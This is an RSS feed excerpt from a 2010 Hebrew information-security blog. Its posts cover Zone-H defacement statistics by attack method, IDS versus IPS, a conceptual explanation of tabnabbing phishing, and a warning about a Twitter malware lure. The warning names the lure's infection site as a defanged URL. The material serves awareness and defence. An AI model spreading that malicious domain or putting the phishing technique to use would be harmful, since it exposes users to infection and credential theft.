		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[Twitter]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1521</guid>
		<description><![CDATA[&#8235;הפעם אני מרוצה כי זה טרול תוצרת חוץ, טורקי (כנראה) שהחליט להשמיץ אותי ב-TWITTER..
Block and report SPAM..

אם מישהו יודע טורקית, מוזמן לתרגם..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftrol-turki&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>הפעם אני מרוצה כי זה טרול תוצרת חוץ, טורקי (כנראה) שהחליט להשמיץ אותי ב-TWITTER..<br />
Block and report SPAM..<br />
<a href="http://guym.co.il/wp-content/uploads/2010/06/turkish.jpg"><img class="aligncenter size-full wp-image-1522" title="טרול טורקי" src="http://guym.co.il/wp-content/uploads/2010/06/turkish.jpg" alt="" width="320" height="480" /></a></p>
<p>אם מישהו יודע טורקית, מוזמן לתרגם..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftrol-turki&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9E%D7%96%D7%9E%D7%9F+%D7%9C%D7%90+%D7%94%D7%99%D7%94+%D7%9C%D7%99+%D7%98%D7%A8%D7%95%D7%9C+http://bit.ly/bYVXRs" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/trol-turki/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8235;0Day חדש למוצרי אדובי&#8236;</title>		<link>http://guym.co.il/0day/?nucrss=1</link>
		<comments>http://guym.co.il/0day/#comments</comments>
		<pubDate>Mon, 07 Jun 2010 03:42:18 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[0Day]]></category>
		<category><![CDATA[Exploits]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1519</guid>
		<description><![CDATA[&#8235;כן, אני יודע ששמעתם על זה כבר, אבל ראיתם את ההדגמה הזו?

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F0day&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>כן, אני יודע ששמעתם על זה כבר, אבל ראיתם את ההדגמה הזו?<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="980" height="765" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/cIY0-3DyQvA&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;hd=1&amp;border=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="980" height="765" src="http://www.youtube.com/v/cIY0-3DyQvA&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;hd=1&amp;border=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F0day&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=0Day+%D7%97%D7%93%D7%A9+%D7%9C%D7%9E%D7%95%D7%A6%D7%A8%D7%99+%D7%90%D7%93%D7%95%D7%91%D7%99+http://bit.ly/bCv1E0" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/0day/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>&#8235;איך פורצים לאתר אינטרנט?&#8236;</title>		<link>http://guym.co.il/hacking-web-site/?nucrss=1</link>
		<comments>http://guym.co.il/hacking-web-site/#comments</comments>
		<pubDate>Sun, 06 Jun 2010 08:55:23 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[פריצה לאתר]]></category>
		<category><![CDATA[פריצה למחשב]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1516</guid>
		<description><![CDATA[&#8235;פעם כתבתי פוסט קטן באותו שם שבו די חיפפתי את השאלה הזאת שנשאלתי כל כך הרבה פעמים (וגם ספגתי על זה המון ביקורת, אבל יש לי עור עבה שמוגן בהרבה ריפוד   ).
הסיבה לפוסט הזה הוא שהאתר Zone-H פירסם כמה סטטיסטיקות מעניינות.
למשל&#8230; מה יותר מאובטח, WINDOWS או LINUX? זו שאלת השאלות.
אם התשובה תיתבסס על [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhacking-web-site&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>פעם כתבתי פוסט קטן באותו שם שבו די חיפפתי את השאלה הזאת שנשאלתי כל כך הרבה פעמים (וגם ספגתי על זה המון ביקורת, אבל יש לי עור עבה שמוגן בהרבה ריפוד <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ).</p>
<p>הסיבה לפוסט הזה הוא שהאתר Zone-H פירסם כמה סטטיסטיקות מעניינות.</p>
<p>למשל&#8230; מה יותר מאובטח, WINDOWS או LINUX? זו שאלת השאלות.</p>
<p>אם התשובה תיתבסס על מה פורצים יותר, Windows מאובטח יותר (זה פופוליזם, אני יודע. האמת היא שיש הרבה יותר שרתי לינוקס באינטרנט ולכן ברור שייפרצו יותר כאלה) :</p>
<table border="1" align="center" bordercolor="#c8c8c8">
<tbody>
<tr>
<td>Year</td>
<td>Total deface­ments Linux (all dis­tros)</td>
<td>Total deface­ments Win­dows (all ver­sions)</td>
</tr>
<tr>
<td>2000</td>
<td>931</td>
<td>2.587</td>
</tr>
<tr>
<td>2001</td>
<td>4.080</td>
<td>13.549</td>
</tr>
<tr>
<td>2002</td>
<td>22.693</td>
<td>43.441</td>
</tr>
<tr>
<td>2003</td>
<td>191.720</td>
<td>58.571</td>
</tr>
<tr>
<td>2004</td>
<td>247.113</td>
<td>119.402</td>
</tr>
<tr>
<td>2005</td>
<td>276.294</td>
<td>179.945</td>
</tr>
<tr>
<td>2006</td>
<td>446.039</td>
<td>258.129</td>
</tr>
<tr>
<td>2007</td>
<td>305.968</td>
<td>139.427</td>
</tr>
<tr>
<td>2008</td>
<td>352.449</td>
<td>141.061</td>
</tr>
<tr>
<td>2009</td>
<td>378.728</td>
<td>143.151</td>
</tr>
<tr>
<td>2010</td>
<td>256.648</td>
<td>87.959</td>
</tr>
<tr>
<td>Total</td>
<td><strong>2.482,663</strong></td>
<td>1.187,222</td>
</tr>
</tbody>
</table>
<p>מה הסיבה לפריצות?</p>
<table border="1" align="center" bordercolor="#c8c8c8">
<tbody>
<tr>
<td>Attack Rea­son</td>
<td>Year 2008</td>
<td>Year 2009</td>
<td>Year 2010</td>
</tr>
<tr>
<td>I just want to be the  best defacer</td>
<td>201.270</td>
<td>122.442</td>
<td>78.761</td>
</tr>
<tr>
<td>Heh just for fun!</td>
<td>96.438</td>
<td>176.725</td>
<td>179.707</td>
</tr>
<tr>
<td>As a challenge</td>
<td>61.112</td>
<td>26.921</td>
<td>13.422</td>
</tr>
<tr>
<td>Polit­i­cal reasons</td>
<td>50.578</td>
<td>72.767</td>
<td>19.360</td>
</tr>
<tr>
<td>Patriotism</td>
<td>46.619</td>
<td>40.374</td>
<td>17.877</td>
</tr>
<tr>
<td>Revenge against that  website</td>
<td>4.802</td>
<td>23.513</td>
<td>15.147</td>
</tr>
<tr>
<td>Not avail­able</td>
<td>56.640</td>
<td>81.667</td>
<td>28.545</td>
</tr>
</tbody>
</table>
<p>הסיבות הנפוצות ביותר הן למטרות גאווה (תראו, אני גבר) ולמטרות כיף. שימו לב שהאקר מקצועי בתחום CyberCrime או בשירות הבטחון במדינות השונות לא יפרסם את הפריצות שלו לאתרים ולכן הסיבות האמיתיות (כסף או מודיעין) לא מופיעות פה.</p>
<p>איך פורצים אתר? (מה השיטות לפריצה של אתרים):</p>
<table style="height: 520px;" border="1" width="399" align="center" bordercolor="#c8c8c8">
<tbody>
<tr>
<td align="center">Attack Method</td>
<td>Total 2008</td>
<td>Total 2009</td>
<td>Total 2010</td>
</tr>
<tr>
<td>Attack against the  administrator/​user (pass­word stealing/​sniffing)</td>
<td>33.141</td>
<td>24.386</td>
<td>10.918</td>
</tr>
<tr>
<td>Shares  mis­con­fig­u­ra­tion</td>
<td>72.192</td>
<td>87.313</td>
<td>55.725</td>
</tr>
<tr>
<td>File Inclu­sion</td>
<td>90.801</td>
<td>95.405</td>
<td>115.574</td>
</tr>
<tr>
<td>SQL  Injec­tion</td>
<td>32.275</td>
<td>57.797</td>
<td>33.920</td>
</tr>
<tr>
<td>Access cre­den­tials  through Man In the Mid­dle attack</td>
<td>37.526</td>
<td>7.385</td>
<td>1.005</td>
</tr>
<tr>
<td>Other Web  Appli­ca­tion bug</td>
<td>36.832</td>
<td>99.546</td>
<td>42.874</td>
</tr>
<tr>
<td>FTP  Server intrusion</td>
<td>32.521</td>
<td>11.749</td>
<td>5.138</td>
</tr>
<tr>
<td>Web Server intrusion</td>
<td>8.334</td>
<td>9.820</td>
<td>7.400</td>
</tr>
<tr>
<td>DNS  attack through cache poisoning</td>
<td>7.541</td>
<td>3.289</td>
<td>1.361</td>
</tr>
<tr>
<td>Other Server  intrusion</td>
<td>5.655</td>
<td>10.799</td>
<td>5.123</td>
</tr>
<tr>
<td>DNS  attack through social engineering</td>
<td>6.310</td>
<td>2.847</td>
<td>1.358</td>
</tr>
<tr>
<td>URL  Poi­son­ing</td>
<td>5.970</td>
<td>6.294</td>
<td>3.516</td>
</tr>
<tr>
<td>Web Server exter­nal  mod­ule intrusion</td>
<td>4.967</td>
<td>2.265</td>
<td>1.313</td>
</tr>
<tr>
<td>Remote  admin­is­tra­tive panel access through bruteforcing</td>
<td>9.991</td>
<td>6.862</td>
<td>7.046</td>
</tr>
<tr>
<td>Rerout­ing after  attack­ing the Firewall</td>
<td>8.143</td>
<td>3.107</td>
<td>1.267</td>
</tr>
<tr>
<td>SSH  Server intrusion</td>
<td>6.231</td>
<td>4.624</td>
<td>4.550</td>
</tr>
<tr>
<td>RPC  Server intrusion</td>
<td>12.359</td>
<td>5.821</td>
<td>2.512</td>
</tr>
<tr>
<td>Rerout­ing after  attack­ing the Router</td>
<td>9.170</td>
<td>2.671</td>
<td>1.327</td>
</tr>
<tr>
<td>Remote ser­vice  pass­word guessing</td>
<td>6.641</td>
<td>3.252</td>
<td>1.103</td>
</tr>
<tr>
<td>Tel­net Server  intrusion</td>
<td>4.050</td>
<td>3.476</td>
<td>2.562</td>
</tr>
<tr>
<td>Remote  admin­is­tra­tive panel access through pass­word guessing</td>
<td>4.915</td>
<td>1.139</td>
<td>422</td>
</tr>
<tr>
<td>Remote  admin­is­tra­tive panel access through social engineering</td>
<td>4.431</td>
<td>1.502</td>
<td>472</td>
</tr>
<tr>
<td>Remote ser­vice  pass­word bruteforce</td>
<td>5.563</td>
<td>3.658</td>
<td>1.002</td>
</tr>
<tr>
<td>Mail Server intrusion</td>
<td>1.441</td>
<td>2.314</td>
<td>1.121</td>
</tr>
<tr>
<td>Not avail­able</td>
<td>70.457</td>
<td>87.684</td>
<td>24.493</td>
</tr>
</tbody>
</table>
<p>מעניין. יש התאמה חלקית עם הניתוח של OWASP לגבי הפגיעויות הנפוצות ביותר אבל לא התאמה מלאה.</p>
<p>ברור שחלק מהנושאים פחות מדברים אל גוף כמו OWASP שעוסק ב-WEB APPLICATIONS אבל המסר העיקרי בהבדל הזה בין הניתוחים הוא שצריך לראות את התמונה השלמה. זה גם מחזק את העובדה שניתוח סיכונים חשוב הרבה יותר מביצוע Pentest בלבד.</p>
<p>האמת היא שיש עוד כמה נושאים שאפשר להסיק מהסטטיסטיקה הזאת, אבל אני אשמור אותם לעצמי כרגע.</p>
<p>היה מאוד מעניין לקרוא את זה.</p>
<p>המקור פה:</p>
<p><a href="http://www.zone-h.org/news/id/4735" target="_blank">http://www.zone-h.org/news/id/4735</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhacking-web-site&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+%D7%A4%D7%95%D7%A8%D7%A6%D7%99%D7%9D+%D7%9C%D7%90%D7%AA%D7%A8+%D7%90%D7%99%D7%A0%D7%98%D7%A8%D7%A0%D7%98%3F+http://bit.ly/be4pEn" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/hacking-web-site/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>&#8235;ניב מחפש עבודה &#8211; אתם יכולים לעזור&#8236;</title>		<link>http://guym.co.il/niv-new-job/?nucrss=1</link>
		<comments>http://guym.co.il/niv-new-job/#comments</comments>
		<pubDate>Sat, 05 Jun 2010 12:27:38 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1514</guid>
		<description><![CDATA[&#8235;חבר טוב שלי, ניב דוד, מחפש עבודה.
ניב הוא מקצוען אמיתי ואנו מכירים כבר הרבה שנים.
אני מאוד מעריך אותו, לדעתי הוא נכס אמיתי לארגון שצריך אנשים מקצוענים שגם חושבים.
ניב מחפש תפקיד מאתגר בתחומי ניהול טכנולוגי, אסטרטגיה טכנולוגית, ניהול לקוחות ופרוייקטים גלובליים מורכבים, אבטחת מידע, ניהול סיכונים, המשכיות עסקית ויעוץ רב-תחומי.
לניב יש נסיון ביעוץ ובניהול תהליכים ופרוייקטים מורכבים [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fniv-new-job&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר טוב שלי, ניב דוד, מחפש עבודה.</p>
<p>ניב הוא מקצוען אמיתי ואנו מכירים כבר הרבה שנים.</p>
<p>אני מאוד מעריך אותו, לדעתי הוא נכס אמיתי לארגון שצריך אנשים מקצוענים שגם חושבים.</p>
<p>ניב מחפש תפקיד מאתגר בתחומי ניהול טכנולוגי, אסטרטגיה טכנולוגית, ניהול לקוחות ופרוייקטים גלובליים מורכבים, אבטחת מידע, ניהול סיכונים, המשכיות עסקית ויעוץ רב-תחומי.</p>
<p>לניב יש נסיון ביעוץ ובניהול תהליכים ופרוייקטים מורכבים בחברות גלובליות, הדורשים שילוביות של תפיסה מערכתית, מוכוונות עסקית ופתרונות יישומיים, טכנולוגיים ואחרים. בעל הכרות נרחבת ונסיון עם טכנולוגיות מגוונות, אבטחת מידע (כולל ניהול סיכונים, המשכיות עסקית, תשתיות, מתודולוגיה, תקנים ורגולציה), פרוייקטים ארגוניים תפעוליים ועוד.</p>
<p>אם מישהו חושב על משרה, אשמח אם תיצרו עימי קשר ואעביר לו את המידע.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fniv-new-job&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%A0%D7%99%D7%91+%D7%9E%D7%97%D7%A4%D7%A9+%D7%A2%D7%91%D7%95%D7%93%D7%94+%E2%80%93+%D7%90%D7%AA%D7%9D+%D7%99%D7%9B%D7%95%D7%9C%D7%99%D7%9D+%D7%9C%D7%A2%D7%96%D7%95%D7%A8+http://bit.ly/ccQgYi" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/niv-new-job/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8235;IDS או IPS?&#8236;</title>		<link>http://guym.co.il/ids-o-ips/?nucrss=1</link>
		<comments>http://guym.co.il/ids-o-ips/#comments</comments>
		<pubDate>Fri, 04 Jun 2010 07:40:22 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[אבטחת מידע]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1509</guid>
		<description><![CDATA[&#8235;בשיעור שלימדתי אתמול בקורס CISO בטכניון הנושא היה Intrusion Detection and Response.
במהלך השיעור יש הסבר על נושאים רבים ומגוונים אך מה שרציתי לספר הוא העניין הבא:
לעיתים קרובות במהלך יעוץ שאני נותן בחברות שונות אני נתקל ברכיבי IPS מותקנים באזורים ברשת. (IPS הם ראשי תיבות של Intrusion Prevention System &#8211; מערכת למניעת פריצה רכיב דומה הוא [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fids-o-ips&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בשיעור שלימדתי אתמול בקורס CISO בטכניון הנושא היה Intrusion Detection and Response.</p>
<p>במהלך השיעור יש הסבר על נושאים רבים ומגוונים אך מה שרציתי לספר הוא העניין הבא:</p>
<p>לעיתים קרובות במהלך יעוץ שאני נותן בחברות שונות אני נתקל ברכיבי IPS מותקנים באזורים ברשת. (IPS הם ראשי תיבות של Intrusion Prevention System &#8211; מערכת למניעת פריצה רכיב דומה הוא IDS &#8211; ראשי תיבות של  &#8211; Intrusion Detection System וזו כמובן מערכת לזיהוי פריצה).</p>
<p>כשאנחנו מנתחים את הצורך הראשוני ברכיב אני מגלה שהדרישה היא &quot;לדעת&quot; בלבד, ללא צורך בתגובה אקטיבית מעבר להתרעה במידה שיש חשש לחדירה.</p>
<p>כשנשאלת השאלה מדוע בחרו ברכיב אקטיבי (IPS) ולא ב-IDS, אך אחד לא ממש יודע לענות. זה מה שהמליצה חברת היעוץ ואף אחד לא חשב אם זה באמת הרכיב הנכון.</p>
<p>אז מה הבעיה עם זה?</p>
<p>רכיבי IDS ו-IPS אמור להשקיף על הפקטות העוברות ברשת. הם מעבדים כל פקטה שהם רואים ומחליטים אם היא בעייתית או לא.</p>
<p>הם יכולים לבצע את ההחלטות לגבי פקטה בעייתית בצורות שונות אבל זה בד&quot;כ בצורה של זיהוי חתימות או זיהוי אנומליות.</p>
<p>IDS ו-IPS הם רכיבים דומים שמגיבים בצורה שונה בעת גילוי פקטה בעייתית. השוני המהותי בין הרכיבים הוא איך הם מטפלים באירוע בו הם מגלים פקטה בעייתית.</p>
<p>IDS פשוט מתעד ומתריע על בעייה (זה יכול להיות ב-LOG או בצורות אחרות).</p>
<p>IPS הוא רכיב אקטיבי יותר ואם הוא מחליט שהפקטה בעייתית, IPS יכול (בנוסף לתיעוד והתרעה) להחזיר תגובה כגון הודעת RESET שתנתק את התקשורת עם התוקף שייצר את הפקטה הבעייתית.</p>
<p>אז למה לא תמיד לשים IPS?</p>
<p>הבעיה ברכיב IPS היא שהוא אקטיבי. קל מאוד להבין שהוא יושב ומשקיף על התעבורה.</p>
<p>לתוקף שמבין שיש IPS ברשת יש כמה אפשרויות, בינהן שתיים מאוד בעייתיות:</p>
<p>1.לבחון שיטות שבהן הוא יוכל &quot;לחמוק&quot; מהרכיב ברשת הביתית שלו ורק אז לבצע את ההתקפה ברשת היעד.</p>
<p>2. בהנחה ויש לו 0Day לרכיב &#8211; הוא יכול לנטרל את ה-IPS או לקבל אליו גישה כזו או אחרת שתעזור לו לבטל את הדיווח והתגובה על ההתקפה שהו מתכנן.</p>
<p>לעומת IPS, רכיב IDS ישב בצורה שקופה ויתעד את הבעיות כשברוב המקרים התוקף לא יבין שה-IDS  מתעד את מעשיו או שרכיב כזה קיים בכלל ברשת.</p>
<p>אז נשאלת השאלה אם IDS הוא חף מהבעיות האלה, למה להשתמש בכלל ב-IPS?</p>
<p>כיוון שלעיתים רבות אנו זקוקים לרכיב הגנה אקטיבי שיכול להגיב באופן אוטומטי ללא התערבות לאיומים מוכרים ו-IPS עונה בדיוק על ההגדרה הזו.</p>
<p>אשמח לדעת מה היא השקפת העולם שלכם בנוגע לרכיבים האלה.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fids-o-ips&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=IDS+%D7%90%D7%95+IPS%3F+http://bit.ly/czKyKd" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/ids-o-ips/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>&#8235;מה זה Tabnabbing?&#8236;</title>		<link>http://guym.co.il/tabnabbing/?nucrss=1</link>
		<comments>http://guym.co.il/tabnabbing/#comments</comments>
		<pubDate>Sun, 30 May 2010 13:35:17 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[WEB]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1505</guid>
		<description><![CDATA[&#8235;זו התקפה חדשה ומגניבה.
הרעיון הוא להוסיף סקריפט לאתר שימתין לזמן בו החלון אינו בפוקוס ועברתם ל-TAB אחר בדפדפן.
כאשר עברתם ל-TAB אחר האתר טוען עצמו מחדש לתוכן שונה &#8211; נניח תוכן שייראה כמו GMAIL, בנק וכ&#34;ו.
יחד עם זה תוחלף הכותרת של הטאב, אם יש FAVICON יוחלף גם הוא.
כשתרצו להכנס ל-GMAIL שלכם אתם (בתקווה) תטעו ותכנסו ל-TAB [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftabnabbing&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>זו התקפה חדשה ומגניבה.</p>
<p>הרעיון הוא להוסיף סקריפט לאתר שימתין לזמן בו החלון אינו בפוקוס ועברתם ל-TAB אחר בדפדפן.</p>
<p>כאשר עברתם ל-TAB אחר האתר טוען עצמו מחדש לתוכן שונה &#8211; נניח תוכן שייראה כמו GMAIL, בנק וכ&quot;ו.</p>
<p>יחד עם זה תוחלף הכותרת של הטאב, אם יש FAVICON יוחלף גם הוא.</p>
<p>כשתרצו להכנס ל-GMAIL שלכם אתם (בתקווה) תטעו ותכנסו ל-TAB הסורר וכך יצליחו לבצע עליכם פישינג מתקדם ומגניב.</p>
<p>סרטון שמראה את ההתקפה:<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="267" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=12003099&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed type="application/x-shockwave-flash" width="400" height="267" src="http://vimeo.com/moogaloop.swf?clip_id=12003099&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><a href="http://vimeo.com/12003099">A New Type of Phishing Attack</a> from <a href="http://vimeo.com/user532161">Aza Raskin</a> on <a href="http://vimeo.com">Vimeo</a>.</p>
<p>הגעתי לזה דרך <a href="http://cyblog.info" target="_blank">דודו</a>. תודה <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>עריכה:</p>
<p>אביב ראף עשה משהו יותר מפחיד. אותו דבר בלי JS. לא ייאמן.: <a href="http://avivraff.com/research/phish/article.php" target="_blank">http://avivraff.com/research/phish/article.php</a></p>
<p>כל כך רציני ש-NO SCRIPT עודכן להתמודד עם זה.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftabnabbing&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9E%D7%94+%D7%96%D7%94+Tabnabbing%3F+http://bit.ly/bovpor" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/tabnabbing/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>&#8235;מעניין.. עוד התקפה שמשתמשת ב-TWITTER.&#8236;</title>		<link>http://guym.co.il/twitter/?nucrss=1</link>
		<comments>http://guym.co.il/twitter/#comments</comments>
		<pubDate>Thu, 20 May 2010 13:00:06 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[MALWARE]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1498</guid>
		<description><![CDATA[&#8235;אם אתם רואים ב-TWITTER את המשפט הזה &#34;haha this is the funniest video ive ever seen&#34; נא לא ללחוץ על הלינק.
הוא מוביל לאתר hXXp://pc-tv.tv שבו תוכלו להידבק בסוסון חביב שעוד לא הספקתי לוודא מה הוא עושה.
זהירות..

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftwitter&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אם אתם רואים ב-TWITTER את המשפט הזה &quot;haha this is the funniest video ive ever seen&quot; נא לא ללחוץ על הלינק.</p>
<p>הוא מוביל לאתר hXXp://pc-tv.tv שבו תוכלו להידבק בסוסון חביב שעוד לא הספקתי לוודא מה הוא עושה.</p>
<p>זהירות..</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/05/112.png"><img class="aligncenter size-full wp-image-1501" title="ה-JAVASCRIPT שמנסה להדביק." src="http://guym.co.il/wp-content/uploads/2010/05/112.png" alt="ה-JAVASCRIPT שמנסה להדביק." width="531" height="137" /></a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftwitter&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9E%D7%A2%D7%A0%D7%99%D7%99%D7%9F..+%D7%A2%D7%95%D7%93+%D7%94%D7%AA%D7%A7%D7%A4%D7%94+%D7%A9%D7%9E%D7%A9%D7%AA%D7%9E%D7%A9%D7%AA+%D7%91-TWITTER.+http://bit.ly/cQ8w6F" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/twitter/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>&#8235;אבטחה של אתר ראשות המיסים&#8236;</title>		<link>http://guym.co.il/maam-site-password/?nucrss=1</link>
		<comments>http://guym.co.il/maam-site-password/#comments</comments>
		<pubDate>Thu, 20 May 2010 08:04:45 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1480</guid>
